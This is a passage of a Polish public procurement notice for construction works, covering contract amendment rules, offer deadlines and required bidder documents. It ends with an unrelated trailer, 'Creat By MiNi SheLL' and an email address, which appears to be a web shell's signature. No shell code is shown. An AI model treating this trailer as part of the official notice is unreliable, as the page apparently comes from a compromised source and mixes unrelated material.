bezusterkowego odbioru końcowego robót.<br/>Treść powyższych zapisów wynika z promesy wstępnej nr Edycja3PGR/2021/2205/PolskiLad dotyczącej dofinansowania inwestycji z Programu Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający zgodnie z art. 455 Ustawy Prawo Zamówień Publicznych dopuszcza następujące zmiany umowy:<br/>1. Wszelkie zmiany i uzupełnienia treści umowy będą wymagać formy pisemnej pod rygorem nieważności, w postaci aneksu<br/>podpisanego przez obie strony. 2. Strony dopuszczają istotne zmiany postanowień umowy w zakresie: 1) zmiany<br/>wynagrodzenia w wypadku wystąpienia którejkolwiek ze zmian przepisów wskazanych w art. 436 pkt 4b ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych, tj. zmiany: a) stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>b) wysokości minimalnego wynagrodzenia za<br/>racę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002<br/>r. o minimalnym wynagrodzeniu za pracę, c) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu<br/>zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, d) zasad gromadzenia i wysokości<br/>wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych<br/>planach kapitałowych- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę. 3. Zmiana<br/>wysokości wynagrodzenia obowiązywać będzie od dnia podpisania aneksu. 4. Wprowadzenie zmian wysokości<br/>wynagrodzenia wymaga uprzedniego wykazania przez Wykonawcę dowodami z dokumentów wysokości dodatkowych<br/>koszów wynikających z wprowadzenia zmian. 5. Zamawiający zobowiązuje się do dokonania analizy dokumentów, w<br/>terminie 7 dni od ich przedłożenia przez Wykonawcę. Aneks zostanie podpisany w terminie uzgodnionym przez obie strony.<br/>6. Niezależnie od powyższych zapisów, zmiana umowy może zostać dokonana w sytuacjach i na warunkach określonych w<br/>art. 454 - 455 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-01-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać używając w tym celu Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-01-03 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje zawarcia umowy ramowej. 2. Wykonawcy ponoszą wszelkie koszty związane z<br/>przygotowaniem oferty. 3. Nie przewiduje się zamówień o których mowa w art. 214 ust. 1 pkt 7 ustawy. 4. Nie przewiduje się<br/>zwrotu kosztów udziału w postępowaniu. 5. Nie przewiduje się udzielenia zaliczki na poczet wykonania zamówienia. 6. Nie<br/>przewiduje się rozliczenia w walutach obcych. 7. Zamawiający nie dopuszcza składania ofert wariantowych oraz w postaci<br/>katalogów elektronicznych. 8. Zamawiający nie dopuszcza składania ofert częściowych. 9. Ofertę składa się na Formularzu<br/>Ofertowym – zgodnie z Zał. nr 1 do SWZ. 10. Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1<br/>ustawy - Roboty budowlane. Do oferty należy dołączyć: 1) Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu, aktualne na dzień składania ofert – zgodnie z Zał. nr 2 do SWZ - w formie elektronicznej lub w<br/>postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, a następnie zaszyfrować wraz z plikami<br/>stanowiącymi ofertę. 2) Upoważnienie lub pełnomocnictwo udzielane osobom podpisującym dokumenty ofertowe, o ile<br/>prawo do reprezentowania wykonawcy w powyższym zakresie nie wynika wprost z dokumentów rejestrowych, jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych. 3) Pełnomocnictwo do<br/>reprezentowania wykonawców w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawie zamówienia publicznego - w przypadku złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (np. konsorcjum, spółka cywilna). Pełnomocnik winien być powołany przez wszystkich wykonawców<br/>ubiegających się wspólnie o zamówienie. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np.<br/>konsorcjum, spółka cywilna), oświadczenie, składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenia te mają potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.

Creat By MiNi SheLL
Email: jattceo@gmail.com